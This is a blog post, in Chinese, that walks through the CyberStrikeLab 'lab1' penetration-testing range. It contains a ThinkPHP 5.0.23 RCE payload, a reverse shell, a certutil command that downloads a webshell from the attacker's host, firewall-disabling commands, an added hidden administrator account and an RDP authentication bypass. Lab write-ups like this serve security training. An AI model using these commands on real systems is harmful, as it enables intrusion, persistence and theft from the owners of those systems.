<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Octopus">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/03/05/cyberstrikelab-lab1/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="CyberStrikeLab - lab1">
<meta property="og:url" content="http://example.com/2025/03/05/CyberStrikeLab-lab1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-03-05T08:04:17.000Z">
<meta property="article:modified_time" content="2025-03-05T11:33:26.921Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="综合渗透靶机">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/alphabet.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/alphabet.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/alphabet.png">
    <!--- Page Info-->
    
    <title>
        
            CyberStrikeLab - lab1 | OctSec
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/121.jpg","dark":"/images/dark.jpg"},"title":"DaZhangYu","subtitle":{"text":["In the things I adore, discipline  finds its way.","Can you still hold on?"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"归档":{"path":"/archives","icon":"fa-regular fa-archive"},"分类":{"path":"/categories/","icon":"fa-regular fa-folder"},"友链":{"icon":"fa-regular fa-link","path":"/links/"},"关于":{"path":"/about/","icon":"fa-regular fa-user"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":"初涉安全，请多指教","show_on_mobile":true,"links":{"标签":{"path":"/tags","icon":"fa-regular fa-tags"},"分类":{"path":"/categories","icon":"fa-regular fa-folder"},"工具":{"icon":"fa-solid fa-bookmark","path":"/bookmarks/"}}},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2025/3/14 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                OctSec
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    归档
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/categories/"
                                        >
                                    <i class="fa-regular fa-folder fa-fw"></i>
                                    分类
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/links/"
                                        >
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    友链
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/about/"
                                        >
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    关于
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                归档
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/categories/"
                        >
                            <span>
                                分类
                            </span>
                            
                                <i class="fa-regular fa-folder fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/links/"
                        >
                            <span>
                                友链
                            </span>
                            
                                <i class="fa-regular fa-link fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/about/"
                        >
                            <span>
                                关于
                            </span>
                            
                                <i class="fa-regular fa-user fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/tags"
                        >
                            <span>标签</span>
                            <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/bookmarks/"
                        >
                            <span>工具</span>
                            <i class="fa-solid fa-bookmark fa-sm fa-fw"></i>
                        </a>
                    </li>
                
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">5</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">8</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">7</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			
			
			<img src="/images/light.jpg" alt="CyberStrikeLab - lab1" class="w-full h-60 sm:h-72 md:h-80 object-cover sm:rounded-t-large dark:brightness-75" />
			
			<div class="w-full flex items-center absolute bottom-0 justify-start">
				<h1 class="article-title-cover text-center mx-6 my-6 text-second-text-color bg-background-color-transparent px-4 py-3 text-3xl sm:text-4xl md:text-5xl font-semibold backdrop-blur-lg rounded-xl border border-border-color ">CyberStrikeLab - lab1</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/octopus3.png">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">Octopus</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-03-05 16:04:17</span>
        <span class="mobile">2025-03-05 16:04:17</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-03-05 19:33:26</span>
            <span class="mobile">2025-03-05 19:33:26</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/%E9%9D%B6%E6%9C%BA%E7%B3%BB%E5%88%97/">靶机系列</a>&nbsp;
                        </li>
                    
                    
                
                    
                        
                            <li>></li>
                        
                        <li>
                            <a href="/categories/%E9%9D%B6%E6%9C%BA%E7%B3%BB%E5%88%97/CyberStrikeLab/">CyberStrikeLab</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F%E9%9D%B6%E6%9C%BA/">综合渗透靶机</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<p>目标：</p>
<p>本次小李的任务是攻克 192.168.10.0&#x2F;24 网段的所有主机，刚开始挺顺利，但深入后发现里面的情况远比想象中的复杂。</p>
<h2 id="外网信息探测"><a href="#外网信息探测" class="headerlink" title="外网信息探测"></a>外网信息探测</h2><p>查看存活主机</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.10.*</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302122910501.png" class title="image-20250302122910501">

<p>使用 fscan 对 192.168.10.* 网段进行扫描，发现 thinkphp poc检测出了漏洞</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228114857535.png" class title="image-20250228114857535">

<p>站点如下</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228115021823.png" class title="image-20250228115021823">



<h2 id="边界突破-192-168-10-10"><a href="#边界突破-192-168-10-10" class="headerlink" title="边界突破 - 192.168.10.10"></a>边界突破 - 192.168.10.10</h2><h3 id="ThinkPHP-5-0-23-RCE"><a href="#ThinkPHP-5-0-23-RCE" class="headerlink" title="ThinkPHP 5.0.23 RCE"></a>ThinkPHP 5.0.23 RCE</h3><p><strong>工具库利用</strong></p>
<p>使用 ThinkPHP 漏洞扫描工具进行历史漏洞扫描，发现大量 thinphp nday 都能打通</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228115120674.png" class title="image-20250228115120674">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228115129755.png" class title="image-20250228115129755">

<p>上传一句话木马文件</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228115200680.png" class title="image-20250228115200680">

<p>蚁剑连接成功</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250228115226573.png" class title="image-20250228115226573">

<p><strong>手工利用</strong></p>
<p>再换一种手工利用的手法</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET:  http://192.168.10.10/?s=captcha&amp;test=-1</span><br><span class="line">POST: _method=__construct&amp;filter[]=system&amp;method=get&amp;get[]=whoami</span><br></pre></td></tr></table></figure></div>

<p>执行有一瞬间出现命令执行结果，然后跳转至 404 页面</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302100619418.png" class title="image-20250302100619418">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302100642312.png" class title="image-20250302100642312">

<p>接下来手工利用反弹 shell，nc 开启 22222 Port</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302100936292.png" class title="image-20250302100936292">

<p>生成 powershell 反弹命令，IP 选择 OpenVPN 分配的 IP 172.16.233.2</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302101132647.png" class title="image-20250302101132647">

<p>Base64 编码并执行，注意关闭防火墙或设置防火墙配置</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302101207302.png" class title="image-20250302101207302">

<p>成功得到 Shell</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302101308073.png" class title="image-20250302101308073">

<p>直接 &gt; 写入一句话木马发现每个字符间存在空字节，导致 PHP 解析错误；</p>
<p>系统内有 certutil，使用其下载本地准备好的一句话木马</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302103707223.png" class title="image-20250302103707223">

<p>本地开启 python web服务</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302104258607.png" class title="image-20250302104258607">

<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -urlcache -split -f http://172.16.233.2:22223/1.php</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302104348794.png" class title="image-20250302104348794">

<p>一句话木马文件下载在网站根目录，蚁剑连接，成功</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302104244291.png" class title="image-20250302104244291">

<p>C 盘根目录拿下旗帜一</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302104554321.png" class title="image-20250302104554321">

<p><strong>上线 CS</strong></p>
<p>上传 CS 木马并执行</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114942426.png" class title="image-20250302114942426">

<p>机器上线成功</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302115031318.png" class title="image-20250302115031318">

<p>禁用防火墙</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall set allprofiles state off 	//关闭所有防火墙，winsows server 2003 之后</span><br><span class="line">netsh advfirewall show allprofiles   //查询域、私有、共有防火墙状态</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302115723132.png" class title="image-20250302115723132">



<h3 id="3389-远程桌面连接"><a href="#3389-远程桌面连接" class="headerlink" title="3389 远程桌面连接"></a>3389 远程桌面连接</h3><p>开启 3389 端口</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302105830463.png" class title="image-20250302105830463">

<p>添加自定义用户</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user abcc 123@abc /add</span><br><span class="line">net localgroup Administrators abcc /add</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302105810303.png" class title="image-20250302105810303">

<p>尝试远程桌面连接</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302105950985.png" class title="image-20250302105950985">

<p>身份证验证导致的错误，直接禁用掉身份证验证</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v UserAuthentication /t REG_DWORD /d 0 /f</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302110101538.png" class title="image-20250302110101538">

<p>再次尝试，成功登录</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302111506571.png" class title="image-20250302111506571">

<h3 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h3><p>翻阅 phpstudy，找到数据库用户名密码</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root/cyberstrike@2024</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302111740743.png" class title="image-20250302111740743">

<p>尝试使用 phpstudy 文件 mysql.exe 登录数据库，失败</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302113247646.png" class title="image-20250302113247646">

<p>phpstudy 中MYSQL并没有开启，尝试直接点击启动，会马上跳回关闭，启动失败</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302113617815.png" class title="image-20250302113617815">

<p>很奇怪的状态，对方是有 3306 端口使用的，我尝试查看当前 mysql 状态</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc query mysql</span><br></pre></td></tr></table></figure></div>

<p>state: 1 stopped，当前 mysql 并没有开启</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302113532666.png" class title="image-20250302113532666">

<p>接下来登录管理员命令行开启 mysql，Windows Server 2012R2 环境较老，win + R 在运行启用管理员命令行失败。打开任务管理器，点击文件，运行新任务，勾选以系统管理权限创建此任务，确定。</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114148322.png" class title="image-20250302114148322">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114219492.png" class title="image-20250302114219492">

<p>启动 mysql 服务</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net start mysql</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114304781.png" class title="image-20250302114304781">

<p>再次尝试连接 MySQL，登录成功</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114337558.png" class title="image-20250302114337558">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302114613073.png" class title="image-20250302114613073">

<p>创建一个允许远程连接的用户并给予足够权限</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CREATE USER &#x27;aabbcc&#x27;@&#x27;%&#x27; IDENTIFIED BY &#x27;aabbcc&#x27;;</span><br><span class="line">GRANT ALL PRIVILEGES ON *.* TO &#x27;aabbcc&#x27;@&#x27;%&#x27;;</span><br><span class="line">FLUSH PRIVILEGES;</span><br></pre></td></tr></table></figure></div>

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302130321863.png" class title="image-20250302130321863">

<p>拿下数据库</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302130419465.png" class title="image-20250302130419465">



<h2 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h2><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><p>外网机器是双网卡，目标内网还有一个 192.168.20.X 网段</p>
<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250302190303722.png" class title="image-20250302190303722">

<img lazyload src="/images/loading.svg" data-src="/2025/03/05/CyberStrikeLab-lab1/image-20250303105119541.png" class title="image-20250303105119541">

<p><strong>Fscan 扫描</strong> </p>
<p>使用 fscan 对 20 段进行扫描</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fscan.exe -h 192.168.20.0/24</span><br></pre></td></tr></table></figure></div>

<p>发现 20 和 30 都有永恒之蓝漏洞</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">192.168.20.20:139 open</span><br><span class="line">192.168.20.10:139 open</span><br><span class="line">192.168.20.10:3306 open</span><br><span class="line">192.168.20.30:445 open</span><br><span class="line">192.168.20.20:445 open</span><br><span class="line">192.168.20.10:445 open</span><br><span class="line">192.168.20.30:139 open</span><br><span class="line">192.168.20.30:135 open</span><br><span class="line">192.168.20.20:135 open</span><br><span class="line">192.168.20.10:80 open</span><br><span class="line">192.168.20.30:88 open</span><br><span class="line">192.168.20.10:135 open</span><br><span class="line">[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600</span><br><span class="line">[*] NetBios 192.168.20.10   WORKGROUP\WIN-KOHRC1DGOL9           Windows Server 2012 R2 Standard 9600</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]192.168.20.20</span><br><span class="line">   [-&gt;]cyberweb</span><br><span class="line">   [-&gt;]192.168.20.20</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]192.168.20.30</span><br><span class="line">   [-&gt;]WIN-7NRTJO59O7N</span><br><span class="line">   [-&gt;]192.168.20.30</span><br><span class="line">[+] MS17-010 192.168.20.20	(Windows Server 2012 R2 Standard 9600)</span><br><span class="line">[+] MS17-010 192.168.20.30	(Windows Server 2008 R2 Standard 7600)</span><br><span class="line">[*] WebTitle http://192.168.20.10      code:200 len:25229  title:易优CMS -  Powered by Eyoucms.com</span><br><span class="line">[+] PocScan http://192.168.20.10 poc-yaml-thinkphp5023-method-rce poc1</span><br></pre></td></tr></table></figure></div>

<h3 id="域控-192-168-20-30"><a href="#域控-192-168-20-30" class="headerlink" title="域控 - 192.168.20.30"></a>域控 - 192.168.20.30</h3><p><strong>CS 派发 MSF 会话</strong>，先开启MSF</p>
